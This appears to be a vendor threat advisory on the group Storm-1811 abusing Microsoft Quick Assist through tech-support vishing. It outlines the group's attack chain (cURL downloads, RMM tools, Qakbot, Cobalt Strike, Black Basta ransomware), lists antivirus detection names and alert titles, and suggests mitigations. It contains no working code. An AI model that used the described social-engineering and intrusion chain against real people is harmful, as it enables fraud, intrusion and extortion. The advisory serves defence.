Since mid-April 2024, the financially motivated cybercriminal group Storm-1811 has been observed exploiting the Microsoft Quick Assist tool in social engineering attacks. The group, known for deploying Black Basta ransomware, begins its attack chain with voice phishing (vishing) to impersonate trusted contacts and deceive targets into granting remote access to their devices.
Misuse of Microsoft Quick Assist by Storm-1811 Technical Overview
Threat Actor: Storm- 1811
Primary Tool Misused: Microsoft Quick Assist
Malware Deployed: Qakbot, Cobalt Strike, Black Basta ransomware
Attack Vectors: Vishing, Remote Monitoring and Management (RRM) tools, social engineering
Attack Chain:
- Initial Access via Vishing:
- The threat actors initiate contact through voice phishing, pretending to be Microsoft technical support or the target’s IT personnel.
- They exploit Quick Assist, a legitimate remote support tool pre-installed on Windows 11 devices, to gain control of the target’s system.
- Remote Monitoring Tools Deployment:
- Once access is granted, the attackers use Quick Assist to run scripted cURL commands to download batch files or ZIP files.
- These files deliver additional malware, including RMM tools like ScreenConnect and NetSupport Manager, and Qakbot.
- Further Intrusion and Ransomware Deployment:
- The attackers perform domain enumeration and lateral movement within the compromised environment using tools like PsExec.
- They deploy Cobalt Strike for persistence and eventually launch Black Basta ransomware to encrypt data and demand ransom.
Impact:
- Organizations across various sectors, including manufacturing, construction, food and beverage, and transportation, have been targeted.
- The attacks can result in significant operational disruption, data loss, and financial loss due to ransom payments and recovery costs.
What Our Threat Intelligence Team is Seeing
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:
- TrojanDownloader:O97M/Qakbot
- Trojan:Win32/QBot
- Trojan:Win32/Qakbot
- TrojanSpy:Win32/Qakbot
- Behavior:Win32/Qakbot
Black Basta threat components are detected as:
- Behavior:Win32/Basta
- Ransom:Win32/Basta
- Trojan:Win32/Basta
Microsoft Defender Antivirus detects Beacon running on a victim process with the following signatures:
- Behavior:Win32/CobaltStrike
- Backdoor:Win64/CobaltStrike
- HackTool:Win64/CobaltStrike
Additional Cobalt Strike components are detected with the following signatures:
- TrojanDropper:PowerShell/Cobacis
- Trojan:Win64/TurtleLoader.CS
- Exploit:Win32/ShellCode.BN
Microsoft Defender for Endpoint
Alerts with the following titles in the security center can indicate threat activity on your network:
- Suspicious activity using Quick Assist
The following alerts might also indicate activity related to this threat:
- Suspicious curl behavior
- A file or network connection related to a ransomware-linked emerging threat activity group detected —This alert captures Storm-1811 activity
- Ransomware-linked emerging threat activity group Storm-0303 detected — This alert captures some Qakbot distributor activity
- Possible Qakbot activity
- Possible NetSupport Manager activity
- Possibly malicious use of proxy or tunneling tool
- Suspicious usage of remote management software
- Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike)
- Human-operated attack using Cobalt Strike
- Ransomware behavior detected in the file system
What We Suggest to Stop Misuse of Microsoft Quick Assist by Storm-1811
- Block or Uninstall Quick Assist:
- Evaluate the necessity of Quick Assist and other RMM tools in your environment. If not required, block or uninstall them to reduce the attack surface.
- Enhance Employee Awareness:
- Conduct training sessions to educate employees on recognizing vishing and tech support scams. Emphasize the importance of verifying unsolicited support calls.
- Implement Multi-Factor Authentication (MFA):
- Enforce MFA for accessing sensitive systems and accounts to add an additional layer of security.
DIFEND WITH CONFIDENCE